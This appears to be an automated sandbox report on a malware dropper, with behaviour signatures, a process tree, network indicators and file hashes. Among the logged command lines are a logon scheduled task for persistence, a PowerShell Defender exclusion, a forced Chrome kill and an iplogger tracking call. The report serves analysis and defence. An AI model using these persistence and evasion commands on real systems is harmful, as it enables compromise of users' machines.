| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1392 set thread context of 2772 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7493EA61-AB10-11EF-8E0F-52DE62627832} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 9aa6e16872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 1710990cbc64.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c862a054a35.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\4f5baa1083db067.exe
4f5baa1083db067.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe
53516815d3135fe3.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe
e4b2f18fb52218.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe
9aa6e16872.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe
f34b9ab9db6d16.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe
1710990cbc64.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe
08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\c862a054a35.exe
c862a054a35.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe
453c5fa76a849.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e1.exe
08240101651be7e1.exe
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe" -a
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527216 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 432
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS5BC7.tmp\Install.cmd" "
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3040 CREDAT:275457 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 104.26.5.15:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.27.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | prophefliloc.tumblr.com | udp |
| US | 74.114.154.18:443 | prophefliloc.tumblr.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| MD | 176.123.2.239:80 | 176.123.2.239 | tcp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| N/A | 127.0.0.1:49266 | tcp | |
| N/A | 127.0.0.1:49269 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| SG | 37.0.11.8:80 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | sanctam.net | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
| MD5 | aaaf685d045b423d4d96ecaca344b4d5 |
| SHA1 | f2264a40421e66029db1cdf7fe8bb8ada2614862 |
| SHA256 | f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8 |
| SHA512 | 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e |
\Users\Admin\AppData\Local\Temp\7zSCD9986B6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2264-31-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSCD9986B6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
